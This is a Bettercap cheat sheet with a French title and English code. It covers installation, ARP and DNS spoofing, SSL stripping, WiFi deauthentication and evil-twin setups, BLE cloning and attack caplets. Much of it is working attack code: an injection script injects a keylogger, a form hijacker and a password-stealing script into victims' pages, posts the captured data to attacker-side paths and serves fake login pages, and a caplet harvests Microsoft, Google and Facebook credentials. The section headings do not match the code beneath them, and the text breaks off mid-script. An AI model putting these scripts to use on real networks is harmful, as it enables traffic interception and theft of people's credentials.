Feuille de Triche Bettercap
```bash
Update system packages
sudo apt update && sudo apt upgrade -y
Install required dependencies
sudo apt install -y build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
git wget curl
Install Go (required for building from source)
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz echo ‘export PATH=$PATH:/usr/local/go/bin’ >> ~/.bashrc source ~/.bashrc
Verify Go installation
go version
Install Bettercap using Go
go install github.com/bettercap/bettercap@latest
Add Go bin to PATH
echo ‘export PATH=$PATH:$(go env GOPATH)/bin’ >> ~/.bashrc source ~/.bashrc
Alternative: Install pre-compiled binary
wget https://github.com/bettercap/bettercap/releases/latest/download/bettercap_linux_amd64_v2.32.0.zip unzip bettercap_linux_amd64_v2.32.0.zip sudo mv bettercap /usr/local/bin/ sudo chmod +x /usr/local/bin/bettercap
Install UI dependencies (optional)
sudo apt install -y nodejs npm sudo npm install -g @bettercap/ui
Create bettercap user (optional)
sudo useradd -r -s /bin/false bettercap sudo usermod -a -G bettercap $USER
Set capabilities for non-root execution
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
Verify installation
bettercap -version
L'architecture modulaire du framework permet aux utilisateurs de charger et d'exécuter des modules spécifiques pour différents types d'attaques réseau et d'activités de reconnaissance. Bettercap prend en charge un large éventail de protocoles et de techniques d'attaque, notamment le spoofing ARP, le spoofing DNS, le spoofing DHCP, les attaques sans fil, les attaques Bluetooth Low Energy (BLE) et les attaques de proxy HTTP/HTTPS. Cette approche globale en fait un outil inestimable pour les professionnels de la sécurité qui doivent évaluer la sécurité réseau sous différents angles et identifier les vulnérabilités à travers différentes couches réseau.
L'une des principales forces de Bettercap est son interface utilisateur web en temps réel, qui offre un tableau de bord intuitif pour surveiller et contrôler les attaques. L'interface web affiche le trafic réseau en direct, les identifiants capturés, les hôtes découverts et le statut des attaques dans un format facile à comprendre. De plus, Bettercap inclut des capacités de scripting puissantes via son moteur JavaScript, permettant aux utilisateurs de créer des scénarios d'attaque personnalisés et d'automatiser des procédures de test complexes. Avec sa communauté de développement active et des mises à jour régulières, Bettercap continue d'évoluer comme l'un des frameworks de test de sécurité réseau les plus polyvalents et efficaces disponibles.
```bash
# Install EPEL repository
sudo yum install -y epel-release
# Install required packages
sudo yum groupinstall -y "Development Tools"
sudo yum install -y libpcap-devel libusb-devel libnetfilter_queue-devel \
git wget curl
# Install Go
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
source ~/.bashrc
# Install Bettercap
go install github.com/bettercap/bettercap@latest
# Set capabilities
sudo setcap cap_net_raw,cap_net_admin=eip $(go env GOPATH)/bin/bettercap
# Configure firewall
sudo firewall-cmd --permanent --add-port=80/tcp
sudo firewall-cmd --permanent --add-port=443/tcp
sudo firewall-cmd --permanent --add-port=8080/tcp
sudo firewall-cmd --reload
```### Installation sur Ubuntu/Debian
Installation de Bettercap sur les systèmes Ubuntu/Debian :
```bash
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install dependencies
brew install libpcap
# Install Go
brew install go
# Install Bettercap
go install github.com/bettercap/bettercap@latest
# Alternative: Install via Homebrew
brew install bettercap
# Verify installation
bettercap -version
```### Installation sur CentOS/RHEL
```bash
# Pull official Bettercap Docker image
docker pull bettercap/bettercap
# Run Bettercap in Docker with network access
docker run -it --rm --privileged --net=host \
-v $(pwd):/app \
bettercap/bettercap
# Run with web UI
docker run -it --rm --privileged --net=host \
-p 80:80 -p 443:443 \
-v $(pwd):/app \
bettercap/bettercap \
-iface eth0 -caplet http-ui
# Create custom Dockerfile
cat > Dockerfile.bettercap ``<< 'EOF'
FROM golang:1.21-alpine AS builder
# Install dependencies
RUN apk add --no-cache git build-base libpcap-dev libusb-dev linux-headers
# Build Bettercap
RUN go install github.com/bettercap/bettercap@latest
FROM alpine:latest
# Install runtime dependencies
RUN apk add --no-cache libpcap libusb iptables
# Copy binary
COPY --from=builder /go/bin/bettercap /usr/local/bin/
# Create working directory
WORKDIR /app
# Expose ports
EXPOSE 80 443 8080
# Default command
CMD ["bettercap"]
EOF
# Build custom image
docker build -f Dockerfile.bettercap -t custom-bettercap .
# Run custom image
docker run -it --rm --privileged --net=host custom-bettercap
```### Installation sur macOS
```powershell
# Install using Chocolatey
choco install golang
choco install git
# Install Bettercap
go install github.com/bettercap/bettercap@latest
# Alternative: Download pre-compiled binary
# Download from: https://github.com/bettercap/bettercap/releases
# Extract to C:\Program Files\Bettercap\
# Install WinPcap or Npcap (required for packet capture)
# Download from: https://npcap.com/
# Add to PATH
$env:PATH += ";C:\Program Files\Bettercap"
# Verify installation
bettercap.exe -version
```### Installation de Docker
Exécution de Bettercap dans Docker :
```bash
# Start Bettercap with automatic interface detection
sudo bettercap
# Specify network interface
sudo bettercap -iface eth0
# Enable network discovery
sudo bettercap -iface eth0
>`` net.probe on
> net.show
# Discover hosts with specific probes
> set net.probe.mdns true
> set net.probe.nbns true
> set net.probe.upnp true
> set net.probe.wsd true
> net.probe on
# Show discovered hosts
> hosts.show
# Show network statistics
> net.stats
# Continuous host discovery
> set ticker.period 1
> set ticker.commands "clear; net.show; hosts.show"
> ticker on
# Save discovered hosts
> hosts.save /tmp/discovered_hosts.json
# Load previously saved hosts
> hosts.load /tmp/discovered_hosts.json
```### Installation sur Windows
```bash
# Basic ARP spoofing setup
sudo bettercap -iface eth0
# Enable ARP spoofing for entire subnet
> arp.spoof on
# Target specific hosts
> set arp.spoof.targets 192.168.1.100,192.168.1.101
> arp.spoof on
# Spoof specific gateway
> set arp.spoof.fullduplex false
> set arp.spoof.targets 192.168.1.1
> arp.spoof on
# Monitor ARP spoofing status
> arp.spoof.stats
# Advanced ARP spoofing with custom intervals
> set arp.spoof.interval 1s
> set arp.spoof.silent false
> arp.spoof on
# Whitelist specific hosts (exclude from spoofing)
> set arp.spoof.whitelist 192.168.1.50,192.168.1.51
> arp.spoof on
# Stop ARP spoofing
> arp.spoof off
# Ban specific hosts (disconnect them)
> arp.ban 192.168.1.100
> arp.unban 192.168.1.100
```## Utilisation de Base
```bash
# Enable DNS spoofing
sudo bettercap -iface eth0
> dns.spoof on
# Spoof specific domains
> set dns.spoof.domains example.com,*.google.com
> set dns.spoof.address 192.168.1.50
> dns.spoof on
# Use custom DNS spoofing rules
> set dns.spoof.hosts /tmp/dns_hosts.txt
> dns.spoof on
# Create custom DNS hosts file
cat > /tmp/dns_hosts.txt << 'EOF'
# Custom DNS spoofing rules
example.com 192.168.1.50
*.facebook.com 192.168.1.51
login.microsoft.com 192.168.1.52
EOF
# Advanced DNS spoofing with logging
> set dns.spoof.silent false
> set dns.spoof.domains *
> dns.spoof on
# Monitor DNS queries
> events.stream on
# Stop DNS spoofing
> dns.spoof off
```### Découverte Réseau
Reconnaissance réseau et découverte de base :
```bash
# Enable HTTP proxy
sudo bettercap -iface eth0
> http.proxy on
# Enable HTTPS proxy with SSL stripping
> https.proxy on
> set https.proxy.sslstrip true
# Custom proxy port
> set http.proxy.port 8080
> set https.proxy.port 8443
> http.proxy on
> https.proxy on
# Inject custom JavaScript
> set http.proxy.script /tmp/inject.js
> http.proxy on
# Create JavaScript injection script
cat > /tmp/inject.js << 'EOF'
function onRequest(req, res) \\\\{
log("Request: " + req.Method + " " + req.URL);
// Log headers
for (var name in req.Headers) \\\\{
log("Header: " + name + " = " + req.Headers[name]);
\\\\}
\\\\}
function onResponse(req, res) \\\\{
log("Response: " + res.Status + " for " + req.URL);
// Inject custom content
if (res.ContentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
var newBody = body.replace("</body>",
"<script>alert('Injected by Bettercap');</script></body>");
res.Body = newBody;
\\\\}
\\\\}
EOF
# Monitor proxy traffic
> events.stream on
# Save captured data
> http.proxy.dump /tmp/http_traffic.log
```### Spoofing ARP
Réalisation d'attaques de spoofing ARP :
```bash
# Enable WiFi monitoring mode (requires compatible adapter)
sudo bettercap -iface wlan0
# Start WiFi reconnaissance
> wifi.recon on
# Show discovered access points
> wifi.show
# Show connected clients
> wifi.show.clients
# Target specific access point
> wifi.recon.channel 6
> set wifi.recon.channel 6
> wifi.recon on
# Deauthentication attack
> set wifi.deauth.targets aa:bb:cc:dd:ee:ff
> wifi.deauth
# Handshake capture
> set wifi.handshakes.file /tmp/handshakes.pcap
> wifi.recon on
# Evil twin attack
> set wifi.ap.ssid "Free WiFi"
> set wifi.ap.bssid aa:bb:cc:dd:ee:ff
> set wifi.ap.channel 6
> wifi.ap
# WPS attacks
> wifi.recon on
> wifi.show
> set wifi.wps.targets aa:bb:cc:dd:ee:ff
> wifi.wps
# Monitor WiFi events
> events.stream on
```### Spoofing DNS
Spoofing et redirection DNS :
```bash
# Enable BLE reconnaissance
sudo bettercap
> ble.recon on
# Show discovered BLE devices
> ble.show
# Enumerate BLE device services
> ble.enum aa:bb:cc:dd:ee:ff
# Write to BLE characteristics
> ble.write aa:bb:cc:dd:ee:ff 1800 2a00 "payload"
# Clone BLE device
> set ble.clone.target aa:bb:cc:dd:ee:ff
> ble.clone
# Monitor BLE events
> events.stream on
# Save BLE scan results
> ble.save /tmp/ble_devices.json
```### Proxy HTTP/HTTPS
Configuration d'un proxy HTTP/HTTPS pour l'interception de trafic :
```bash
# Create basic reconnaissance caplet
cat > /tmp/recon.cap << 'EOF'
# Basic network reconnaissance caplet
# Set interface
set $ \\\\{by_name eth0\\\\}
# Enable network discovery
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
net.probe on
# Enable ARP spoofing for entire subnet
arp.spoof on
# Enable DNS spoofing
set dns.spoof.domains *
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# Enable HTTP proxy
set http.proxy.script /tmp/inject.js
http.proxy on
# Enable HTTPS proxy with SSL stripping
set https.proxy.sslstrip true
https.proxy on
# Start event streaming
events.stream on
# Display status every 5 seconds
set ticker.period 5
set ticker.commands "clear; net.show; hosts.show"
ticker on
EOF
# Run caplet
sudo bettercap -caplet /tmp/recon.cap
# Create advanced MITM caplet
cat > /tmp/mitm.cap << 'EOF'
# Advanced MITM attack caplet
# Variables
set $TARGET 192.168.1.100
set $GATEWAY 192.168.1.1
set $INTERFACE eth0
# Set interface
set $ \\\\{by_name $INTERFACE\\\\}
# Target specific host
set arp.spoof.targets $TARGET
set arp.spoof.fullduplex true
arp.spoof on
# DNS spoofing for specific domains
set dns.spoof.domains facebook.com,*.facebook.com,google.com,*.google.com
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# HTTP/HTTPS proxy with custom script
set http.proxy.script /tmp/advanced_inject.js
http.proxy on
set https.proxy.sslstrip true
set https.proxy.script /tmp/advanced_inject.js
https.proxy on
# Logging
set http.proxy.dump /tmp/http_dump.log
set https.proxy.dump /tmp/https_dump.log
# Events
events.stream on
EOF
# Create credential harvesting caplet
cat > /tmp/harvest.cap << 'EOF'
# Credential harvesting caplet
# Set interface
set $ \\\\{by_name eth0\\\\}
# ARP spoofing
arp.spoof on
# DNS spoofing to redirect login pages
set dns.spoof.domains login.microsoft.com,accounts.google.com,www.facebook.com
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# HTTP proxy with credential extraction
set http.proxy.script /tmp/harvest.js
http.proxy on
# HTTPS proxy
set https.proxy.sslstrip true
set https.proxy.script /tmp/harvest.js
https.proxy on
# Start web server for phishing pages
set http.server.path /tmp/phishing
set http.server.port 80
http.server on
events.stream on
EOF
# Run specific caplet
sudo bettercap -caplet /tmp/mitm.cap -iface eth0
```## Fonctionnalités Avancées
```javascript
// Advanced HTTP/HTTPS injection script
// File: /tmp/advanced_inject.js
var credentials = [];
var sessions = \\\\{\\\\};
function onLoad() \\\\{
log("Advanced injection module loaded");
\\\\}
function onRequest(req, res) \\\\{
var url = req.URL;
var method = req.Method;
var host = req.Hostname;
log("[" + method + "] " + host + url);
// Log interesting headers
if (req.Headers["Authorization"]) \\\\{
log("Authorization header found: " + req.Headers["Authorization"]);
\\\\}
if (req.Headers["Cookie"]) \\\\{
log("Cookies: " + req.Headers["Cookie"]);
sessions[host] = req.Headers["Cookie"];
\\\\}
// Extract POST data for credential harvesting
if (method == "POST" && req.Body) \\\\{
var body = req.ReadBody();
log("POST data: " + body);
// Look for common credential fields
if (body.indexOf("password") != -1||body.indexOf("passwd") != -1) \\\\{
log("Potential credentials captured: " + body);
credentials.push(\\\\{
host: host,
url: url,
data: body,
timestamp: new Date().toISOString()
\\\\});
// Save credentials to file
writeFile("/tmp/credentials.json", JSON.stringify(credentials, null, 2));
\\\\}
\\\\}
\\\\}
function onResponse(req, res) \\\\{
var contentType = res.ContentType;
var url = req.URL;
var host = req.Hostname;
log("Response: " + res.Status + " for " + url);
// Inject into HTML pages
if (contentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
// Inject keylogger
var keylogger = `
<script>
var keys = [];
document.addEventListener('keydown', function(e) \\{
keys.push(\\{
key: e.key,
timestamp: new Date().toISOString(),
url: window.location.href
\\});
// Send to attacker server every 50 keystrokes
if (keys.length >= 50) \\{
fetch('/keylog', \\{
method: 'POST',
body: JSON.stringify(keys),
headers: \\{'Content-Type': 'application/json'\\}
\\});
keys = [];
\\}
\\});
// Send on page unload
window.addEventListener('beforeunload', function() \\{
if (keys.length > 0) \\{
navigator.sendBeacon('/keylog', JSON.stringify(keys));
\\}
\\});
</script>
`;
// Inject form hijacker
var formHijacker = `
<script>
document.addEventListener('DOMContentLoaded', function() \\{
var forms = document.querySelectorAll('form');
forms.forEach(function(form) \\{
form.addEventListener('submit', function(e) \\{
var formData = new FormData(form);
var data = \\{\\};
for (var pair of formData.entries()) \\{
data[pair[0]] = pair[1];
\\}
fetch('/formdata', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
data: data,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\});
\\});
\\});
</script>
`;
// Inject scripts before closing body tag
body = body.replace("</body>", keylogger + formHijacker + "</body>");
// Replace login pages with phishing pages
if (url.indexOf("login") != -1||url.indexOf("signin") != -1) \\\\{
body = createPhishingPage(host, url);
\\\\}
res.Body = body;
\\\\}
// Modify JavaScript files
if (contentType.indexOf("application/javascript") == 0||
contentType.indexOf("text/javascript") == 0) \\\\{
var body = res.ReadBody();
// Inject malicious code into JavaScript
var maliciousCode = `
// Injected by Bettercap
setInterval(function() \\{
if (document.querySelector('input[type="password"]')) \\{
var passwords = document.querySelectorAll('input[type="password"]');
passwords.forEach(function(p) \\{
if (p.value) \\{
fetch('/password', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
password: p.value,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\}
\\});
\\}
\\}, 5000);
`;
body = maliciousCode + "\n" + body;
res.Body = body;
\\\\}
\\\\}
function createPhishingPage(host, url) \\\\{
return `
<!DOCTYPE html>
<html>
<head>
<title>Login - $\\{host\\}</title>
<style>
body \\{ font-family: Arial, sans-serif; margin: 50px; \\}
.login-form \\{ max-width: 400px; margin: 0 auto; padding: 20px; border: 1px solid #ddd; \\}
input \\{ width: 100%; padding: 10px; margin: 10px 0; \\}
button \\{ width: 100%; padding: 10px; background: #007cba; color: white; border: none; \\}
</style>
</head>
<body>
<div class="login-form">
<h2>Sign In</h2>
<form action="/phish" method="POST">
<input type="hidden" name="original_url" value="$\\{url\\}">
<input type="text" name="username" placeholder="Username" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Sign In</button>
</form>
</div>
<script>
document.querySelector('form').addEventListener('submit', function(e) \\{
e.preventDefault();
var formData = new FormData(this);
var data = \\{\\};
for (var pair of formData.entries()) \\{
data[pair[0]] = pair[1];
\\}
fetch('/phish', \\{
method: 'POST',
body: JSON.stringify(data),
headers: \\{'Content-Type': 'application/json'\\}
\\}).then(function() \\{
window.location.href = data.original_url;
\\});
\\});
</script>
</body>
</html>
`;
\\\\}
function writeFile(path, content) \\\\{
// This is a placeholder - actual file writing would need to be implemented
// in the Bettercap JavaScript engine
log("Writing to file: " + path);
\\\\}
```### Attaques Sans Fil
Reconnaissance et attaques WiFi :
```bash
# Create comprehensive monitoring caplet
cat > /tmp/monitor.cap << 'EOF'
# Network monitoring caplet
# Set interface
set $ \\\\{by_name eth0\\\\}
# Enable comprehensive network discovery
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
set net.probe.wsd true
set net.probe.throttle 100
net.probe on
# Enable packet sniffing
set net.sniff.verbose true
set net.sniff.local true
set net.sniff.filter "tcp port 80 or tcp port 443 or tcp port 21 or tcp port 22"
set net.sniff.output /tmp/captured_packets.pcap
net.sniff on
# Monitor specific protocols
set syn.scan.targets 192.168.1.0/24
set syn.scan.ports 22,80,443,3389,5900
syn.scan
# Enable GPS tracking (if available)
gps on
# Set up event logging
events.stream on
set events.stream.output /tmp/bettercap_events.log
# Display comprehensive status
set ticker.period 10
set ticker.commands "clear; net.show; hosts.show; syn.scan.show"
ticker on
EOF
# Run monitoring caplet
sudo bettercap -caplet /tmp/monitor.cap
# Real-time traffic analysis
sudo bettercap -iface eth0
> set net.sniff.verbose true
> set net.sniff.regexp ".*password.*|.*login.*|.*auth.*"
> net.sniff on
# Protocol-specific monitoring
> set net.sniff.filter "tcp port 21" # FTP
> set net.sniff.filter "tcp port 23" # Telnet
> set net.sniff.filter "tcp port 110" # POP3
> set net.sniff.filter "tcp port 143" # IMAP
> net.sniff on
```### Attaques Bluetooth Low Energy (BLE)
Reconnaissance et attaques BLE :
```bash
#!/bin/bash
# Comprehensive Bettercap automation script
# Configuration
INTERFACE="eth0"
TARGET_NETWORK="192.168.1.0/24"
ATTACK_TYPE="mitm"
OUTPUT_DIR="/tmp/bettercap_$(date +%Y%m%d_%H%M%S)"
LOG_FILE="$OUTPUT_DIR/attack.log"
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Logging function
log_message() \\\\{
echo "$(date '+%Y-%m-%d %H:%M:%S') - $1"|tee -a "$LOG_FILE"
\\\\}
# Check if running as root
check_root() \\\\{
if [ "$EUID" -ne 0 ]; then
echo "This script must be run as root"
exit 1
fi
\\\\}
# Check dependencies
check_dependencies() \\\\{
log_message "Checking dependencies..."
if ! command -v bettercap >/dev/null 2>&1; then
log_message "ERROR: Bettercap not found"
exit 1
fi
if ! ip link show "$INTERFACE" >/dev/null 2>&1; then
log_message "ERROR: Interface $INTERFACE not found"
exit 1
fi
log_message "Dependencies check passed"
\\\\}
# Network reconnaissance
network_recon() \\\\{
log_message "Starting network reconnaissance..."
cat > "$OUTPUT_DIR/recon.cap" << EOF
# Network reconnaissance caplet
set \$ \\\\{by_name $INTERFACE\\\\}
# Enable comprehensive discovery
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
set net.probe.wsd true
net.probe on
# Save discovered hosts
hosts.save $OUTPUT_DIR/discovered_hosts.json
# Port scanning
set syn.scan.targets $TARGET_NETWORK
set syn.scan.ports 22,23,25,53,80,110,143,443,993,995,3389,5900
syn.scan
# Save scan results
syn.scan.save $OUTPUT_DIR/port_scan.json
# Run for 60 seconds
sleep 60
# Stop and exit
net.probe off
quit
EOF
timeout 120 bettercap -caplet "$OUTPUT_DIR/recon.cap" 2>&1|tee -a "$LOG_FILE"
log_message "Network reconnaissance completed"
\\\\}
# MITM attack
mitm_attack() \\\\{
local target="$1"
log_message "Starting MITM attack against $target..."
cat > "$OUTPUT_DIR/mitm.cap" << EOF
# MITM attack caplet
set \$ \\\\{by_name $INTERFACE\\\\}
# Target specific host
set arp.spoof.targets $target
set arp.spoof.fullduplex true
arp.spoof on
# DNS spoofing
set dns.spoof.domains *
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# HTTP proxy with logging
set http.proxy.script $OUTPUT_DIR/inject.js
set http.proxy.dump $OUTPUT_DIR/http_traffic.log
http.proxy on
# HTTPS proxy with SSL stripping
set https.proxy.sslstrip true
set https.proxy.script $OUTPUT_DIR/inject.js
set https.proxy.dump $OUTPUT_DIR/https_traffic.log
https.proxy on
# Packet capture
set net.sniff.output $OUTPUT_DIR/packets.pcap
set net.sniff.verbose false
net.sniff on
# Event logging
events.stream on
set events.stream.output $OUTPUT_DIR/events.log
# Status updates
set ticker.period 30
set ticker.commands "hosts.show; arp.spoof.stats"
ticker on
EOF
# Create injection script
cat > "$OUTPUT_DIR/inject.js" << 'EOF'
var credentials = [];
function onRequest(req, res) \\\\{
log("[REQ] " + req.Method + " " + req.URL);
if (req.Method == "POST" && req.Body) \\\\{
var body = req.ReadBody();
if (body.indexOf("password") != -1||body.indexOf("login") != -1) \\\\{
log("Potential credentials: " + body);
credentials.push(\\\\{
url: req.URL,
data: body,
timestamp: new Date().toISOString()
\\\\});
\\\\}
\\\\}
\\\\}
function onResponse(req, res) \\\\{
if (res.ContentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
var injection = '<script>console.log("Injected by Bettercap");</script>';
body = body.replace("</body>", injection + "</body>");
res.Body = body;
\\\\}
\\\\}
EOF
# Run MITM attack
bettercap -caplet "$OUTPUT_DIR/mitm.cap" 2>&1|tee -a "$LOG_FILE" &
BETTERCAP_PID=$!
log_message "MITM attack started (PID: $BETTERCAP_PID)"
# Run for specified duration or until interrupted
local duration=$\\\\{ATTACK_DURATION:-300\\\\} # 5 minutes default
sleep "$duration"
# Stop attack
kill $BETTERCAP_PID 2>/dev/null
log_message "MITM attack stopped"
\\\\}
# WiFi attacks
wifi_attack() \\\\{
local wifi_interface="$1"
log_message "Starting WiFi attacks on $wifi_interface..."
cat > "$OUTPUT_DIR/wifi.cap" << EOF
# WiFi attack caplet
set \$ \\\\{by_name $wifi_interface\\\\}
# WiFi reconnaissance
wifi.recon on
# Save discovered networks
wifi.save $OUTPUT_DIR/wifi_networks.json
# Handshake capture
set wifi.handshakes.file $OUTPUT_DIR/handshakes.pcap
# Run for 5 minutes
sleep 300
# Stop and save
wifi.recon off
quit
EOF
timeout 360 bettercap -caplet "$OUTPUT_DIR/wifi.cap" 2>&1|tee -a "$LOG_FILE"
log_message "WiFi attacks completed"
\\\\}
# Generate report
generate_report() \\\\{
log_message "Generating attack report..."
local report_file="$OUTPUT_DIR/attack_report.html"
cat > "$report_file" << EOF
<!DOCTYPE html>
<html>
<head>
<title>Bettercap Attack Report</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}
.section \\\\{ margin: 20px 0; padding: 15px; border: 1px solid #ddd; \\\\}
.data \\\\{ background: #f5f5f5; padding: 10px; font-family: monospace; \\\\}
table \\\\{ border-collapse: collapse; width: 100%; \\\\}
th, td \\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}
th \\\\{ background-color: #f2f2f2; \\\\}
</style>
</head>
<body>
<h1>Bettercap Attack Report</h1>
<p>Generated: $(date)</p>
<p>Target Network: $TARGET_NETWORK</p>
<p>Interface: $INTERFACE</p>
<div class="section">
<h2>Discovered Hosts</h2>
<div class="data">
EOF
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
cat "$OUTPUT_DIR/discovered_hosts.json" >> "$report_file"
else
echo "No hosts discovered" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
</div>
<div class="section">
<h2>Port Scan Results</h2>
<div class="data">
EOF
if [ -f "$OUTPUT_DIR/port_scan.json" ]; then
cat "$OUTPUT_DIR/port_scan.json" >> "$report_file"
else
echo "No port scan results" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
</div>
<div class="section">
<h2>Captured Traffic Summary</h2>
<div class="data">
EOF
if [ -f "$OUTPUT_DIR/http_traffic.log" ]; then
echo "HTTP Requests: $(wc -l < "$OUTPUT_DIR/http_traffic.log")" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/https_traffic.log" ]; then
echo "HTTPS Requests: $(wc -l < "$OUTPUT_DIR/https_traffic.log")" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/packets.pcap" ]; then
echo "Captured Packets: $(tcpdump -r "$OUTPUT_DIR/packets.pcap" 2>/dev/null|wc -l)" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
</div>
<div class="section">
<h2>Attack Log</h2>
<div class="data">
<pre>$(tail -n 50 "$LOG_FILE")</pre>
</div>
</div>
</body>
</html>
EOF
log_message "Report generated: $report_file"
\\\\}
# Cleanup function
cleanup() \\\\{
log_message "Cleaning up..."
# Kill any running Bettercap processes
pkill -f bettercap 2>/dev/null
# Reset network settings
echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null
log_message "Cleanup completed"
\\\\}
# Signal handlers
trap cleanup EXIT
trap cleanup INT
trap cleanup TERM
# Main execution
main() \\\\{
log_message "Starting Bettercap automation script"
check_root
check_dependencies
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
case "$ATTACK_TYPE" in
"recon")
network_recon
;;
"mitm")
network_recon
# Extract targets from reconnaissance
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
# Get first discovered host as target
local target=$(grep -o '"ip":"[^"]*"' "$OUTPUT_DIR/discovered_hosts.json"|head -n 1|cut -d'"' -f4)
if [ -n "$target" ]; then
mitm_attack "$target"
fi
fi
;;
"wifi")
wifi_attack "wlan0"
;;
"full")
network_recon
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
local target=$(grep -o '"ip":"[^"]*"' "$OUTPUT_DIR/discovered_hosts.json"|head -n 1|cut -d'"' -f4)
if [ -n "$target" ]; then
mitm_attack "$target"
fi
fi
# WiFi attacks if interface available
if ip link show wlan0 >/dev/null 2>&1; then
wifi_attack "wlan0"
fi
;;
*)
log_message "Unknown attack type: $ATTACK_TYPE"
exit 1
;;
esac
generate_report
log_message "Attack completed. Results in: $OUTPUT_DIR"
\\\\}
# Parse command line arguments
while [[ $# -gt 0 ]]; do
case $1 in
-i|--interface)
INTERFACE="$2"
shift 2
;;
-t|--target)
TARGET_NETWORK="$2"
shift 2
;;
-a|--attack)
ATTACK_TYPE="$2"
shift 2
;;
-d|--duration)
ATTACK_DURATION="$2"
shift 2
;;
-h|--help)
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo " -i, --interface IFACE Network interface (default: eth0)"
echo " -t, --target NETWORK Target network (default: 192.168.1.0/24)"
echo " -a, --attack TYPE Attack type: recon|mitm|wifi|full (default: mitm)"
echo " -d, --duration SECONDS Attack duration (default: 300)"
echo " -h, --help Show this help"
exit 0
;;
*)
echo "Unknown option: $1"
exit 1
;;
esac
done
# Run main function
main
```### Caplets Personnalisés
Création et utilisation de caplets personnalisés (scripts d'automatisation) :
```python
#!/usr/bin/env python3
# Bettercap SIEM integration script
import json
import time
import requests
import subprocess
from datetime import datetime
import logging
class BettercapSIEMIntegration:
def __init__(self, config):
self.config = config
self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/bettercap_siem.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def parse_bettercap_events(self, events_file):
"""Parse Bettercap events log file"""
events = []
try:
with open(events_file, 'r') as f:
for line in f:
if line.strip():
try:
event = json.loads(line)
events.append(self.normalize_event(event))
except json.JSONDecodeError:
# Handle non-JSON log lines
events.append(self.parse_text_event(line))
except FileNotFoundError:
self.logger.error(f"Events file not found: \\\\{events_file\\\\}")
return events
def normalize_event(self, event):
"""Normalize Bettercap event to common format"""
normalized = \\\\{
'timestamp': event.get('time', datetime.now().isoformat()),
'source': 'bettercap',
'event_type': event.get('tag', 'unknown'),
'severity': self.determine_severity(event),
'raw_event': event
\\\\}
# Extract specific fields based on event type
tag = event.get('tag', '')
if tag == 'net.sniff':
normalized.update(\\\\{
'src_ip': event.get('data', \\\\{\\\\}).get('src'),
'dst_ip': event.get('data', \\\\{\\\\}).get('dst'),
'protocol': event.get('data', \\\\{\\\\}).get('protocol'),
'payload': event.get('data', \\\\{\\\\}).get('payload')
\\\\})
elif tag == 'arp.spoof':
normalized.update(\\\\{
'target_ip': event.get('data', \\\\{\\\\}).get('target'),
'gateway_ip': event.get('data', \\\\{\\\\}).get('gateway'),
'attack_type': 'arp_spoofing'
\\\\})
elif tag == 'dns.spoof':
normalized.update(\\\\{
'domain': event.get('data', \\\\{\\\\}).get('domain'),
'spoofed_ip': event.get('data', \\\\{\\\\}).get('address'),
'attack_type': 'dns_spoofing'
\\\\})
elif tag == 'http.proxy':
normalized.update(\\\\{
'method': event.get('data', \\\\{\\\\}).get('method'),
'url': event.get('data', \\\\{\\\\}).get('url'),
'user_agent': event.get('data', \\\\{\\\\}).get('user_agent'),
'attack_type': 'http_interception'
\\\\})
return normalized
def parse_text_event(self, line):
"""Parse non-JSON log lines"""
return \\\\{
'timestamp': datetime.now().isoformat(),
'source': 'bettercap',
'event_type': 'log',
'severity': 'info',
'message': line.strip()
\\\\}
def determine_severity(self, event):
"""Determine event severity"""
tag = event.get('tag', '')
high_severity_tags = ['arp.spoof', 'dns.spoof', 'wifi.deauth', 'ble.attack']
medium_severity_tags = ['http.proxy', 'https.proxy', 'net.sniff']
if tag in high_severity_tags:
return 'high'
elif tag in medium_severity_tags:
return 'medium'
else:
return 'low'
def send_to_splunk(self, events):
"""Send events to Splunk via HEC"""
if not self.config.get('splunk', \\\\{\\\\}).get('enabled', False):
return
splunk_config = self.config['splunk']
for event in events:
splunk_event = \\\\{
'time': event['timestamp'],
'source': 'bettercap',
'sourcetype': 'bettercap:event',
